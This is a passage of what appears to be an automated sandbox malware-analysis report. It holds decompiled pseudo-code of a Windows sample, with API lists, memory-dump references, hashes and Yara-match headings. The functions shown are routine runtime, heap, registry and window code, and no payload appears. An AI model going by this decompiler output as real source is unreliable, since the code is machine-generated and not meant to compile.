                    				GetClientRect( *0x2970e4,  &_v20);
                    				asm("sbb eax, eax");
                    				ShowWindow( *0x2970f4,  ~( *0x2970f8) & 0x00000005);
                    				_t35 = _v20.bottom;
                    				_t34 = _v20.right;
                    				_t21 = 0;
                    				if( *0x2970f8 != 0) {
                    					SendMessageW( *0x2970f4, 5, 0, 0);
                    					GetWindowRect( *0x2970f4,  &_v36);
                    					_t21 = _v36.bottom - _v36.top;
                    				}
                    				SetWindowPos( *0x2970ec, 0, 0, 0, _t34, _t35 - _t21, 0x204);
                    				return E00281090();
                    			}










                    APIs
                    • GetMenu.USER32(?), ref: 0028118B
                    • CheckMenuItem.USER32(00000000), ref: 00281192
                    • GetClientRect.USER32 ref: 002811A3
                    • ShowWindow.USER32(?,?), ref: 002811BD
                    • SendMessageW.USER32(?,00000005,00000000,00000000), ref: 002811DE
                    • GetWindowRect.USER32 ref: 002811EF
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000204), ref: 00281211
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Window$MenuRect$CheckClientItemMessageSendShow
                    • String ID:
                    • API String ID: 1873219884-0
                    • Opcode ID: 5e2dae1d591911e2bda0c7fe2bbc35a4e4642905c10af0262a8f2b52d905c589
                    • Instruction ID: d298f31800ca825345a110d533cc6ed42ef43913a9f12aa33c3243670af063dc
                    • Opcode Fuzzy Hash: 5e2dae1d591911e2bda0c7fe2bbc35a4e4642905c10af0262a8f2b52d905c589
                    • Instruction Fuzzy Hash: 0211607566421AAFD710DB74FD8EEBB37BCEB48701F104527FA19D3290E634A8408B64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E004029C1(void* __ecx) {
                    				void* _t8;
                    				void* _t11;
                    				void* _t13;
                    				void* _t14;
                    				void* _t18;
                    				void* _t23;
                    				long _t24;
                    				void* _t27;
                    
                    				_t13 = __ecx;
                    				if( *0x415040 != 0xffffffff) {
                    					_t24 = GetLastError();
                    					_t11 = E00402CA4(_t13,  *0x415040);
                    					_t14 = _t23;
                    					if(_t11 == 0xffffffff) {
                    						L5:
                    						_t11 = 0;
                    					} else {
                    						if(_t11 == 0) {
                    							if(E00402CDF(_t14,  *0x415040, 0xffffffff) != 0) {
                    								_push(0x28);
                    								_t27 = E004057DE();
                    								_t18 = 1;
                    								if(_t27 == 0) {
                    									L8:
                    									_t11 = 0;
                    									E00402CDF(_t18,  *0x415040, 0);
                    								} else {
                    									_t8 = E00402CDF(_t18,  *0x415040, _t27);
                    									_pop(_t18);
                    									if(_t8 != 0) {
                    										_t11 = _t27;
                    										_t27 = 0;
                    									} else {
                    										goto L8;
                    									}
                    								}
                    								E0040571A(_t27);
                    							} else {
                    								goto L5;
                    							}
                    						}
                    					}
                    					SetLastError(_t24);
                    					return _t11;
                    				} else {
                    					return 0;
                    				}
                    			}












                    APIs
                    • GetLastError.KERNEL32(?,?,004029B8,004027E8,00401E66), ref: 004029CF
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004029DD
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004029F6
                    • SetLastError.KERNEL32(00000000,004029B8,004027E8,00401E66), ref: 00402A48
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: 70247efa9ed0a105f5c3cc4c9e138fb419d640718360533235fe7f9ad7db5892
                    • Instruction ID: 078a338927bebc8a57084cdf0b2594a36b0b0cb36656b2d2252d312e3d5e2cf0
                    • Opcode Fuzzy Hash: 70247efa9ed0a105f5c3cc4c9e138fb419d640718360533235fe7f9ad7db5892
                    • Instruction Fuzzy Hash: FA012832308A119EE63566B9AE8D5AB2F44EB45338B20023FF510755E1EFFD4C01699C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 81%
                    			E00288869(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                    				signed int _t15;
                    				LONG* _t21;
                    				void* _t31;
                    				LONG* _t33;
                    				void* _t34;
                    				void* _t35;
                    
                    				_t35 = __eflags;
                    				_t29 = __edx;
                    				_t25 = __ebx;
                    				_push(0xc);
                    				_push(0x292218);
                    				E00283D50(__ebx, __edi, __esi);
                    				_t31 = E00286908(__ebx, __edx, _t35);
                    				_t15 =  *0x294ba0; // 0xfffffffe
                    				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                    					E00286FB4(_t25, _t31, 0xd);
                    					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                    					_t33 =  *(_t31 + 0x68);
                    					 *(_t34 - 0x1c) = _t33;
                    					__eflags = _t33 -  *0x294aa8; // 0x294680
                    					if(__eflags != 0) {
                    						__eflags = _t33;
                    						if(__eflags != 0) {
                    							__eflags = InterlockedDecrement(_t33);
                    							if(__eflags == 0) {
                    								__eflags = _t33 - 0x294680;
                    								if(__eflags != 0) {
                    									E00286D64(_t33);
                    								}
                    							}
                    						}
                    						_t21 =  *0x294aa8; // 0x294680
                    						 *(_t31 + 0x68) = _t21;
                    						_t33 =  *0x294aa8; // 0x294680
                    						 *(_t34 - 0x1c) = _t33;
                    						InterlockedIncrement(_t33);
                    					}
                    					 *(_t34 - 4) = 0xfffffffe;
                    					E00288904();
                    				} else {
                    					_t33 =  *(_t31 + 0x68);
                    				}
                    				_t38 = _t33;
                    				if(_t33 == 0) {
                    					_push(0x20);
                    					E00286018(_t29, _t38);
                    				}
                    				return E00283D95(_t33);
                    			}










                    APIs
                    • __getptd.LIBCMT ref: 00288875
                      • Part of subcall function 00286908: __getptd_noexit.LIBCMT ref: 0028690B
                      • Part of subcall function 00286908: __amsg_exit.LIBCMT ref: 00286918
                    • __amsg_exit.LIBCMT ref: 00288895
                    • __lock.LIBCMT ref: 002888A5
                    • InterlockedDecrement.KERNEL32(?), ref: 002888C2
                    • _free.LIBCMT ref: 002888D5
                    • InterlockedIncrement.KERNEL32(00294680), ref: 002888ED
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                    • String ID:
                    • API String ID: 3470314060-0
                    • Opcode ID: 1277535ef06fe0f3cad4d47dfb4f4b24c0652439060b9f18cba5d371534ac753
                    • Instruction ID: 84137c96b7b895cfbe0124852af427265dd5a560597324c05d5ac04aedb2ce7a
                    • Opcode Fuzzy Hash: 1277535ef06fe0f3cad4d47dfb4f4b24c0652439060b9f18cba5d371534ac753
                    • Instruction Fuzzy Hash: D0018439D6272AAFCB20BF54A809B5D7760BF04720FC5001AE800676D1CB346972CFD6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 25%
                    			E00404F84(intOrPtr _a4) {
                    				char _v16;
                    				signed int _v20;
                    				signed int _t11;
                    				int _t14;
                    				void* _t16;
                    				void* _t20;
                    				int _t22;
                    				signed int _t23;
                    
                    				_t11 =  *0x415010; // 0xb51c3102
                    				 *[fs:0x0] =  &_v16;
                    				_v20 = _v20 & 0x00000000;
                    				_t14 =  &_v20;
                    				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], 0x40d42f, 0xffffffff);
                    				if(_t14 != 0) {
                    					_t14 = GetProcAddress(_v20, "CorExitProcess");
                    					_t22 = _t14;
                    					if(_t22 != 0) {
                    						 *0x40e160(_a4);
                    						_t14 =  *_t22();
                    					}
                    				}
                    				if(_v20 != 0) {
                    					_t14 = FreeLibrary(_v20);
                    				}
                    				 *[fs:0x0] = _v16;
                    				return _t14;
                    			}












                    APIs
                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,B51C3102,?,?,00000000,0040D42F,000000FF,?,00404F60,00000002,?,00404F34,004057DD), ref: 00404FB9
                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00404FCB
                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,0040D42F,000000FF,?,00404F60,00000002,?,00404F34,004057DD), ref: 00404FED
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressFreeHandleLibraryModuleProc
                    • String ID: CorExitProcess$mscoree.dll
                    • API String ID: 4061214504-1276376045
                    • Opcode ID: 44008817a766496d30a0b71b405d55bf33a24efc73ce07632b22a39922047233
                    • Instruction ID: f45cf89818bd8daf17f7f5fa5db09656c02fb6dca8b021926776a3611c212177
                    • Opcode Fuzzy Hash: 44008817a766496d30a0b71b405d55bf33a24efc73ce07632b22a39922047233
                    • Instruction Fuzzy Hash: 1101A771914626EBDB119F51DC05FAEBBB8FB44715F00493AE811B22D0DBB89900CB54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00281020() {
                    				void* _v8;
                    				int _v12;
                    				int _v16;
                    				char _v20;
                    				char _t16;
                    				char _t21;
                    
                    				_t21 = 0x60;
                    				if(RegOpenKeyW(0x80000005, L"Software\\Fonts",  &_v8) == 0) {
                    					_v12 = 4;
                    					if(RegQueryValueExW(_v8, L"LogPixels", 0,  &_v16,  &_v20,  &_v12) == 0 && _v16 == 4) {
                    						_t16 = _v20;
                    						if(_t16 != 0) {
                    							_t21 = _t16;
                    						}
                    					}
                    					RegCloseKey(_v8);
                    				}
                    				return _t21;
                    			}










                    APIs
                    • RegOpenKeyW.ADVAPI32(80000005,Software\Fonts,?), ref: 0028103A
                    • RegQueryValueExW.ADVAPI32(?,LogPixels,00000000,00281594,?,?,?,00281594), ref: 00281062
                    • RegCloseKey.ADVAPI32(?,?,00281594), ref: 0028107F
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID: LogPixels$Software\Fonts
                    • API String ID: 3677997916-4238338266
                    • Opcode ID: ec47200165fe8600c54d34ae0db90ad44790778083e78f9b90c9336b94be9767
                    • Instruction ID: 306c5256eadb9436e8dc5988c617e6a8f06c15c9f70c456ece14354245bdb028
                    • Opcode Fuzzy Hash: ec47200165fe8600c54d34ae0db90ad44790778083e78f9b90c9336b94be9767
                    • Instruction Fuzzy Hash: 3AF01975A1020AABDB10DF949C84FAF73BCAB04741F104599ED05E2180E631AA65CB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 58%
                    			E00409AC0(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
                    				signed int _v8;
                    				intOrPtr _v12;
                    				void* _v24;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t40;
                    				intOrPtr _t45;
                    				signed int _t48;
                    				void* _t51;
                    				signed int _t55;
                    				intOrPtr _t64;
                    				intOrPtr _t69;
                    				void* _t72;
                    				intOrPtr _t73;
                    				intOrPtr _t89;
                    				void* _t90;
                    				intOrPtr* _t92;
                    				void* _t94;
                    				intOrPtr* _t95;
                    				signed int _t96;
                    				void* _t97;
                    				intOrPtr* _t98;
                    				intOrPtr* _t100;
                    				void* _t103;
                    
                    				_push(__ecx);
                    				_push(__ecx);
                    				_t40 =  *0x415010; // 0xb51c3102
                    				_v8 = _t40 ^ _t96;
                    				_t89 = _a20;
                    				if(_t89 > 0) {
                    					_t69 = E0040AE45(_a16, _t89);
                    					_t103 = _t69 - _t89;
                    					_t4 = _t69 + 1; // 0x1
                    					_t89 = _t4;
                    					if(_t103 >= 0) {
                    						_t89 = _t69;
                    					}
                    				}
                    				_t71 = _a32;
                    				if(_a32 == 0) {
                    					_t71 =  *((intOrPtr*)( *_a4 + 8));
                    					_a32 =  *((intOrPtr*)( *_a4 + 8));
                    				}
                    				_t45 = E004073AA(_t71, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t89, 0, 0);
                    				_t98 = _t97 + 0x18;
                    				_v12 = _t45;
                    				if(_t45 == 0) {
                    					L38:
                    					_pop(_t90);
                    					_pop(_t94);
                    					_pop(_t72);
                    					return E004018D4(_t45, _t72, _v8 ^ _t96, 0x400, _t90, _t94);
                    				} else {
                    					_t16 = _t45 + _t45 + 8; // 0x8
                    					asm("sbb eax, eax");
                    					_t48 = _t45 + _t45 & _t16;
                    					if(_t48 == 0) {
                    						_t95 = 0;
                    						L36:
                    						_t73 = 0;
                    						L37:
                    						E00407EE5(_t95);
                    						_t45 = _t73;
                    						goto L38;
                    					}
                    					if(_t48 > 0x400) {
                    						_t95 = E00407D48(_t48);
                    						if(_t95 == 0) {
                    							goto L36;
                    						}
                    						 *_t95 = 0xdddd;
                    						L12:
                    						if(_t95 == 0) {
                    							goto L36;
                    						}
                    						_t51 = E004073AA(_t71, 1, _a16, _t89, _t95, _v12);
                    						_t100 = _t98 + 0x18;
                    						if(_t51 == 0) {
                    							goto L36;
                    						}
                    						_t91 = _v12;
                    						_t73 = E004085AD(_a8, _a12, _t95, _v12, 0, 0, 0, 0, 0);
                    						if(_t73 == 0) {
                    							goto L36;
                    						}
                    						if((_a12 & 0x00000400) == 0) {
                    							_t30 = _t73 + _t73 + 8; // 0x8
                    							asm("sbb eax, eax");
                    							_t55 = _t73 + _t73 & _t30;
                    							if(_t55 == 0) {
                    								_t92 = 0;
                    								L34:
                    								E00407EE5(_t92);
                    								goto L36;
                    							}
                    							if(_t55 > 0x400) {
                    								_t92 = E00407D48(_t55);
                    								if(_t92 == 0) {
                    									goto L34;
                    								}
                    								 *_t92 = 0xdddd;
                    								L26:
                    								_t92 = _t92 + 8;
                    								if(_t92 == 0 || E004085AD(_a8, _a12, _t95, _v12, _t92, _t73, 0, 0, 0) == 0) {
                    									goto L34;
                    								} else {
                    									_push(0);
                    									_push(0);
                    									if(_a28 != 0) {
                    										_push(_a28);
                    										_push(_a24);
                    									} else {
                    										_push(0);
                    										_push(0);
                    									}
                    									_push(_t73);
                    									_push(_t92);
                    									_push(0);
                    									_push(_a32);
                    									_t73 = E00407464();
                    									if(_t73 == 0) {
                    										goto L34;
                    									} else {
                    										E00407EE5(_t92);
                    										goto L37;
                    									}
                    								}
                    							}
                    							E004018F0(_t55);
                    							_t92 = _t100;
                    							if(_t92 == 0) {
                    								goto L34;
                    							}
                    							 *_t92 = 0xcccc;
                    							goto L26;
                    						}
                    						_t64 = _a28;
                    						if(_t64 == 0) {
                    							goto L37;
                    						}
                    						if(_t73 > _t64) {
                    							goto L36;
                    						}
                    						_t73 = E004085AD(_a8, _a12, _t95, _t91, _a24, _t64, 0, 0, 0);
                    						if(_t73 != 0) {
                    							goto L37;
                    						}
                    						goto L36;
                    					}
                    					E004018F0(_t48);
                    					_t95 = _t98;
                    					if(_t95 == 0) {
                    						goto L36;
                    					}
                    					 *_t95 = 0xcccc;
                    					goto L12;
                    				}
                    			}





























                    APIs
                    • __alloca_probe_16.LIBCMT ref: 00409B45
                    • __alloca_probe_16.LIBCMT ref: 00409C0E
                    • __freea.LIBCMT ref: 00409C75
                      • Part of subcall function 00407D48: RtlAllocateHeap.NTDLL(00000000,00406E77,?,?,00406E77,00000220,?,00000000,?), ref: 00407D7A
                    • __freea.LIBCMT ref: 00409C88
                    • __freea.LIBCMT ref: 00409C95
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: __freea$__alloca_probe_16$AllocateHeap
                    • String ID:
                    • API String ID: 1423051803-0
                    • Opcode ID: f6944c5e00c5e4c39a1b83b9d8c7ae9ea2b5230d77e8078ec350ae024e7a64ca
                    • Instruction ID: f5d5e5908dbe2b0eece80851408d63fed06286bdfdf7f28fe4aa87bf0313151d
                    • Opcode Fuzzy Hash: f6944c5e00c5e4c39a1b83b9d8c7ae9ea2b5230d77e8078ec350ae024e7a64ca
                    • Instruction Fuzzy Hash: C351A172A042066FFB209F65CC85EBB36E9EF84714F15453EFC04B6292E638DC109669
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E0028A613(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
                    				void* _t7;
                    				long _t8;
                    				intOrPtr* _t9;
                    				intOrPtr* _t12;
                    				long _t27;
                    				long _t30;
                    
                    				if(_a4 != 0) {
                    					_push(__esi);
                    					_t30 = _a8;
                    					__eflags = _t30;
                    					if(_t30 != 0) {
                    						_push(__edi);
                    						while(1) {
                    							__eflags = _t30 - 0xffffffe0;
                    							if(_t30 > 0xffffffe0) {
                    								break;
                    							}
                    							__eflags = _t30;
                    							if(_t30 == 0) {
                    								_t30 = _t30 + 1;
                    								__eflags = _t30;
                    							}
                    							_t7 = HeapReAlloc( *0x295a6c, 0, _a4, _t30);
                    							_t27 = _t7;
                    							__eflags = _t27;
                    							if(_t27 != 0) {
                    								L17:
                    								_t8 = _t27;
                    							} else {
                    								__eflags =  *0x295f5c - _t7;
                    								if(__eflags == 0) {
                    									_t9 = E00283CF8(__eflags);
                    									 *_t9 = E00283CB6(GetLastError());
                    									goto L17;
                    								} else {
                    									__eflags = E0028A030(_t7, _t30);
                    									if(__eflags == 0) {
                    										_t12 = E00283CF8(__eflags);
                    										 *_t12 = E00283CB6(GetLastError());
                    										L12:
                    										_t8 = 0;
                    										__eflags = 0;
                    									} else {
                    										continue;
                    									}
                    								}
                    							}
                    							goto L14;
                    						}
                    						E0028A030(_t6, _t30);
                    						 *((intOrPtr*)(E00283CF8(__eflags))) = 0xc;
                    						goto L12;
                    					} else {
                    						E00286D64(_a4);
                    						_t8 = 0;
                    					}
                    					L14:
                    					return _t8;
                    				} else {
                    					return E0028A4FD(__edx, __edi, __esi, _a8);
                    				}
                    			}










                    APIs
                    • _malloc.LIBCMT ref: 0028A621
                      • Part of subcall function 0028A4FD: __FF_MSGBANNER.LIBCMT ref: 0028A516
                      • Part of subcall function 0028A4FD: __NMSG_WRITE.LIBCMT ref: 0028A51D
                      • Part of subcall function 0028A4FD: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00286C96,00000000,00000001,00000000,?,00286F3F,00000018,00292178,0000000C,00286FCF), ref: 0028A542
                    • _free.LIBCMT ref: 0028A634
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: AllocHeap_free_malloc
                    • String ID:
                    • API String ID: 2734353464-0
                    • Opcode ID: a1285f0af0c4e35a3a16c079fb2ede2cdaa62f9048aeef5b8f58784441b5991f
                    • Instruction ID: 8b1c38851e5a957656932905b8294c8beb5e52fbe9aacbabd78ad63360d43619
                    • Opcode Fuzzy Hash: a1285f0af0c4e35a3a16c079fb2ede2cdaa62f9048aeef5b8f58784441b5991f
                    • Instruction Fuzzy Hash: 7611083A537625AADF313F74E809B5D379C9B403A0B298427FC05961D0FE7489708F95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E00288FEC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                    				signed int _t12;
                    				void* _t28;
                    				intOrPtr _t29;
                    				void* _t30;
                    				void* _t31;
                    
                    				_t31 = __eflags;
                    				_t26 = __edi;
                    				_t25 = __edx;
                    				_t20 = __ebx;
                    				_push(0xc);
                    				_push(0x292258);
                    				E00283D50(__ebx, __edi, __esi);
                    				_t28 = E00286908(__ebx, __edx, _t31);
                    				_t12 =  *0x294ba0; // 0xfffffffe
                    				if(( *(_t28 + 0x70) & _t12) == 0) {
                    					L6:
                    					E00286FB4(_t20, _t26, 0xc);
                    					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                    					_t29 = _t28 + 0x6c;
                    					 *((intOrPtr*)(_t30 - 0x1c)) = E00288F9D(_t29,  *0x294de8);
                    					 *(_t30 - 4) = 0xfffffffe;
                    					E00289059();
                    				} else {
                    					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
                    					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                    						goto L6;
                    					} else {
                    						_t29 =  *((intOrPtr*)(E00286908(_t20, __edx, _t33) + 0x6c));
                    					}
                    				}
                    				_t34 = _t29;
                    				if(_t29 == 0) {
                    					_push(0x20);
                    					E00286018(_t25, _t34);
                    				}
                    				return E00283D95(_t29);
                    			}









                    APIs
                    • __getptd.LIBCMT ref: 00288FF8
                      • Part of subcall function 00286908: __getptd_noexit.LIBCMT ref: 0028690B
                      • Part of subcall function 00286908: __amsg_exit.LIBCMT ref: 00286918
                    • __getptd.LIBCMT ref: 0028900F
                    • __amsg_exit.LIBCMT ref: 0028901D
                    • __lock.LIBCMT ref: 0028902D
                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00289041
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                    • String ID:
                    • API String ID: 938513278-0
                    • Opcode ID: 817099fbc43211af88f122356ecb12a9e4b82689294a8166dd8079b4875a5a39
                    • Instruction ID: 053b38cad9e0da09abf38205a6be91bbc7b74487292a8b85b21c634c357aa49d
                    • Opcode Fuzzy Hash: 817099fbc43211af88f122356ecb12a9e4b82689294a8166dd8079b4875a5a39
                    • Instruction Fuzzy Hash: 06F0B43AE377049BDB21BBB4A90BB2D37D06F01721F554109F510AB2D2CB744AA1AF96
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00402BE3(WCHAR* _a4) {
                    				struct HINSTANCE__* _t4;
                    
                    				_t4 = LoadLibraryExW(_a4, 0, 0x800);
                    				if(_t4 != 0) {
                    					return _t4;
                    				} else {
                    					if(GetLastError() != 0x57 || E00405A18(_a4, L"api-ms-", 7) == 0) {
                    						return 0;
                    					}
                    					return LoadLibraryExW(_a4, 0, 0);
                    				}
                    			}





                    APIs
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00402B94,00000000,?,00415C98,?,?,?,00402D37,00000004,InitializeCriticalSectionEx,0040EC70,InitializeCriticalSectionEx), ref: 00402BF0
                    • GetLastError.KERNEL32(?,00402B94,00000000,?,00415C98,?,?,?,00402D37,00000004,InitializeCriticalSectionEx,0040EC70,InitializeCriticalSectionEx,00000000,?,00402AB7), ref: 00402BFA
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00402C22
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad$ErrorLast
                    • String ID: api-ms-
                    • API String ID: 3177248105-2084034818
                    • Opcode ID: 6c1d3bad6412e7e4ca00ce12fd0f74fdde52119193a629733f7392a7739fe272
                    • Instruction ID: e589de4d7b83ec3a89ad76cef1a63b0294eee27024da7e6f7d3f22e711884464
                    • Opcode Fuzzy Hash: 6c1d3bad6412e7e4ca00ce12fd0f74fdde52119193a629733f7392a7739fe272
                    • Instruction Fuzzy Hash: 2CE01230644204B6FB111B62EE0AB1E3A54AB10B55F104831F90DB41E1EBF69964899C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E00409F8D(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
                    				char _v16;
                    				signed int _v20;
                    				char _v28;
                    				char _v35;
                    				signed char _v36;
                    				void _v44;
                    				signed char* _v48;
                    				char _v49;
                    				long _v56;
                    				long _v60;
                    				intOrPtr _v64;
                    				struct _OVERLAPPED* _v68;
                    				signed int _v72;
                    				signed char* _v76;
                    				signed int _v80;
                    				signed int _v84;
                    				intOrPtr _v88;
                    				void _v92;
                    				long _v96;
                    				signed char* _v100;
                    				void* _v104;
                    				char _v108;
                    				int _v112;
                    				intOrPtr _v116;
                    				struct _OVERLAPPED* _v120;
                    				struct _OVERLAPPED* _v124;
                    				struct _OVERLAPPED* _v128;
                    				struct _OVERLAPPED* _v132;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t174;
                    				signed int _t175;
                    				signed int _t177;
                    				int _t183;
                    				signed char* _t186;
                    				signed int _t190;
                    				signed char _t191;
                    				intOrPtr _t194;
                    				void* _t196;
                    				long _t197;
                    				long _t201;
                    				signed char* _t207;
                    				void _t209;
                    				signed char* _t214;
                    				void* _t221;
                    				char _t224;
                    				char* _t228;
                    				void* _t237;
                    				long _t243;
                    				signed int _t244;
                    				signed char* _t245;
                    				void* _t255;
                    				intOrPtr _t261;
                    				void* _t262;
                    				struct _OVERLAPPED* _t263;
                    				intOrPtr* _t264;
                    				signed int _t265;
                    				intOrPtr _t266;
                    				signed int _t271;
                    				struct _OVERLAPPED* _t274;
                    				signed int _t276;
                    				signed char _t281;
                    				signed int _t285;
                    				signed char* _t286;
                    				struct _OVERLAPPED* _t289;
                    				void* _t292;
                    				signed int _t293;
                    				signed int _t295;
                    				struct _OVERLAPPED* _t296;
                    				signed char* _t298;
                    				intOrPtr* _t299;
                    				void* _t300;
                    				signed int _t301;
                    				long _t302;
                    				signed int _t304;
                    				signed int _t305;
                    				void* _t306;
                    				void* _t307;
                    				void* _t308;
                    
                    				_push(0xffffffff);
                    				_push(0x40d469);
                    				_push( *[fs:0x0]);
                    				_t307 = _t306 - 0x74;
                    				_t174 =  *0x415010; // 0xb51c3102
                    				_t175 = _t174 ^ _t305;
                    				_v20 = _t175;
                    				_push(_t175);
                    				 *[fs:0x0] =  &_v16;
                    				_t177 = _a8;
                    				_t298 = _a12;
                    				_t261 = _a20;
                    				_t265 = (_t177 & 0x0000003f) * 0x38;
                    				_t285 = _t177 >> 6;
                    				_v100 = _t298;
                    				_v64 = _t261;
                    				_v72 = _t285;
                    				_v84 = _t265;
                    				_v104 =  *((intOrPtr*)(_t265 +  *((intOrPtr*)(0x4160f8 + _t285 * 4)) + 0x18));
                    				_v88 = _a16 + _t298;
                    				_t183 = GetConsoleOutputCP();
                    				_t309 =  *((char*)(_t261 + 0x14));
                    				_v112 = _t183;
                    				if( *((char*)(_t261 + 0x14)) == 0) {
